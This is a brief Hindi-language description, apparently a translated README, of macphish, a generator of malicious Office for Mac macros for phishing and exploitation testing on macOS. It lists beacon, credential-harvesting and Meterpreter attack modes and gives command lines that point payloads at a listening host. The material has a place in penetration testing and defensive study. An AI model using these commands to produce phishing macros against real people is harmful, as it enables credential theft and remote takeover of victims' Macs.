
बीकन, क्रेडेंशियल हार्वेस्टिंग, और मीटरप्रेटर पेलोड के साथ macOS के लिए दुर्भावनापूर्ण Office for Mac मैक्रोज़ उत्पन्न करता है, जो macOS पर फ़िशिंग और शोषण परीक्षण के लिए है।
Mac के लिए ऑफिस मैक्रो पेलोड जनरेटर

4 हमले के वेक्टर उपलब्ध हैं:
'creds' विधि के लिए, macphish सीधे Applescript स्क्रिप्ट उत्पन्न कर सकता है, यदि आपको इसे शेल से चलाने की आवश्यकता हो।
निष्पादन पर, यह पेलोड हमारे सुनने वाले होस्ट को संकेत देगा और पीड़ित के बारे में बुनियादी सिस्टम जानकारी प्रदान करेगा। बेकन पेलोड उत्पन्न करने का सबसे सरल तरीका है:
$./macphish.py -lh <listening host>
डिफ़ॉल्ट रूप से, यह curl का उपयोग करता है लेकिन कमांड टेम्पलेट को संशोधित करके अन्य उपयोगिताओं (wget, nslookup) का उपयोग किया जा सकता है।
$./macphish.py -lh <listening host> -lp <listening port> -a creds
$./macphish.py -lh <listening host> -lp <listening port> -p <payload> -a meterpreter
$./macphish.py -lh <listening host> -lp <listening port> -p <payload> -a meterpreter-grant
मीटरप्रेटर हमलों के लिए, फिलहाल केवल पायथन पेलोड समर्थित हैं।
देखें https://github.com/cldrn/macphish/wiki/Usage